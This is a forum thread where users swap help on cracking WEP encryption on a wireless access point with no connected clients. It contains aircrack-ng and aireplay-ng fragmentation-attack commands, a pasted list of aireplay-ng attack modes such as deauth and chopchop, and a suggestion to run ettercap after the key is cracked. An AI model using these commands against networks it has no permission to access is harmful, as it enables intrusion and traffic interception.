Results 1 to 9 of 9

Thread: AP with no clients

  1. #1
    Just burned his ISO
    Join Date
    Apr 2007
    Posts
    18

    Default AP with no clients

    Guys,

    Is there a guide to crack wep on a AP with no clients?

    John.

  2. #2
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by mrhotdoguk View Post
    Guys,

    Is there a guide to crack wep on a AP with no clients?

    John.
    Yes. Search for clientless WEP cracking.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  3. #3
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    18

    Default

    tazforum.thetazzone.com/viewtopic.php?t=6611

    my tutorial, hope it helps, pass it on if you like it.

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by jaymill23 View Post
    tazforum.thetazzone.com/viewtopic.php?t=6611

    my tutorial, hope it helps, pass it on if you like it.
    Nice tut...just read it...but one of the last things you wrote was "$ aircrack-ng -n 64 -b $AP *.ivs

    **note, if its 128 bit, change 64 to 128**

    how do you know if its 64 or 128 bit encryption?? I assumed you couldnt tell
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  5. #5
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by Xploitz View Post
    Nice tut...just read it...but one of the last things you wrote was "$ aircrack-ng -n 64 -b $AP *.ivs

    **note, if its 128 bit, change 64 to 128**

    how do you know if its 64 or 128 bit encryption?? I assumed you couldnt tell
    If you don't know, leave out the -n option. It will default to 128 which is most likely.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  6. #6
    Just burned his ISO
    Join Date
    Mar 2006
    Posts
    10

    Default

    when i input aireplay-ng -5 -b 00:40:**:**:00:** -h 00:**:02:**:ac:f8 all I get is a bunch of options , does this mean my card is not supported??
    filter options:

    -b bssid : MAC address, Access Point
    -d dmac : MAC address, Destination
    -s smac : MAC address, Source
    -m len : minimum packet length
    -n len : maximum packet length
    -u type : frame control, type field
    -v subt : frame control, subtype field
    -t tods : frame control, To DS bit
    -f fromds : frame control, From DS bit
    -w iswep : frame control, WEP bit

    replay options:

    -x nbpps : number of packets per second
    -p fctrl : set frame control word (hex)
    -a bssid : set Access Point MAC address
    -c dmac : set Destination MAC address
    -h smac : set Source MAC address
    -e essid : fakeauth attack : set target AP SSID
    -j : arpreplay attack : inject FromDS pkts
    -g value : change ring buffer size (default: 8)
    -k IP : set destination IP in fragments
    -l IP : set source IP in fragments
    -o npckts : number of packets per burst (-1)
    -q sec : seconds between keep-alives (-1)
    -y prga : keystream for shared key auth

    source options:

    -i iface : capture packets from this interface
    -r file : extract packets from this pcap file

    attack modes (Numbers can still be used):

    --deauth count : deauthenticate 1 or all stations (-0)
    --fakeauth delay : fake authentication with AP (-1)
    --interactive : interactive frame selection (-2)
    --arpreplay : standard ARP-request replay (-3)
    --chopchop : decrypt/chopchop WEP packet (-4)
    --fragment : generates valid keystream (-5)

  7. #7
    Just burned his ISO
    Join Date
    Mar 2006
    Posts
    10

    Default

    This works great. I never put in ath1 after aireplay-ng -5 -b 00:40:**:**:00:** -h 00:**:02:**:ac:f8.

    Great tutorial keep up the good work.

  8. #8
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by jay2005 View Post
    when i input....all I get is a bunch of options...
    In almost any program, this is a good indication that you gooned up something on the command line, as you already figured out.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  9. #9
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    18

    Default

    Thanks guys.
    I have 2 ettercap tutorials on the site as well, that you could use after cracking the WEP.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •